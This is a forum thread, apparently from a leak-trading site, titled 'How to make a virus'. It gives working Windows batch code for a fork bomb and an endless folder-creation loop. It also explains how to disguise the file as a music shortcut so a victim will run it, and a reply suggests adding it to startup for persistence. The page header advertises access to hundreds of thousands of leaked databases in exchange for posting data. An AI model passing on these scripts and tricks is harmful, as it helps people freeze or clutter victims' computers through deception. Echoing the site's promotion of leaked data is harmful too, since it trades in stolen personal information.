Create an account

Very important

  • To access the important data of the forums, you must be active in each forum and especially in the leaks and database leaks section, send data and after sending the data and activity, data and important content will be opened and visible for you.
  • You will only see chat messages from people who are at or below your level.
  • More than 500,000 database leaks and millions of account leaks are waiting for you, so access and view with more activity.
  • Many important data are inactive and inaccessible for you, so open them with activity. (This will be done automatically)


Thread Rating:
  • 790 Vote(s) - 3.65 Average
  • 1
  • 2
  • 3
  • 4
  • 5
How to make a virus

#1
This is step by step tutorial that explains how to make a virus. Here you’ll teach how to make simplest virus called fork bomb and how to make a virus that will make an unlimmited amount of folders in any place you want.

1)How To Make The Simplest Virus – Fork Bomb

Launching fork bomb will lead to total CPU jam by opening about 500 process of command prompt . CPU usage will be overloaded and computer will freeze.
1) Launch notepad and type

%0|%0

2) Save as .bat , for example fork.bat

3) Launch .bat file that you created in step 2 , once a successful fork bomb has activated in a system, one may have to reboot to resume normal operation.


2) How To make A virus That Will Make 1,000 Folders In Few Seconds

Here I will teach you simple virus that will make an unlimmited amount of folders in any place you want.

Step 1

Open notepad and type :

@echo off
:top
md %random%
goto top

@echo off makes it so that it appears to be a blank screen but actually its making hundreds of folder.
md %random% is command that creating folders with random names.
goto top – return to label :top , infinite loop

Step 2

Save it as 1000folders.bat

People probably not going to click on an icon that looks like this picture so to make it better (funnier and easier to prank people with) make a short-cut to it

Step 3

Right click on icon and click Create Shortcut

Step 4

Right click on shortcut and click properties , then click on Change Icon and rename icon

tell the person that you found the music they wanted and downloaded it on there computer, that way they will think its a shortcut to the music and they will click on it then they will think its loading so they wont exit right away when they finally realize its not going to load or so many errors have came up they realized
somethings wrong it will be to late) also just something to know its impossible to delete them using cmd you HAVE to find all of them and delete them manually…
Reply

#2
Add it to start up might be more deadly.
Reply



Forum Jump:


Users browsing this thread:
1 Guest(s)

©0Day  2016 - 2023 | All Rights Reserved.  Made with    for the community. Connected through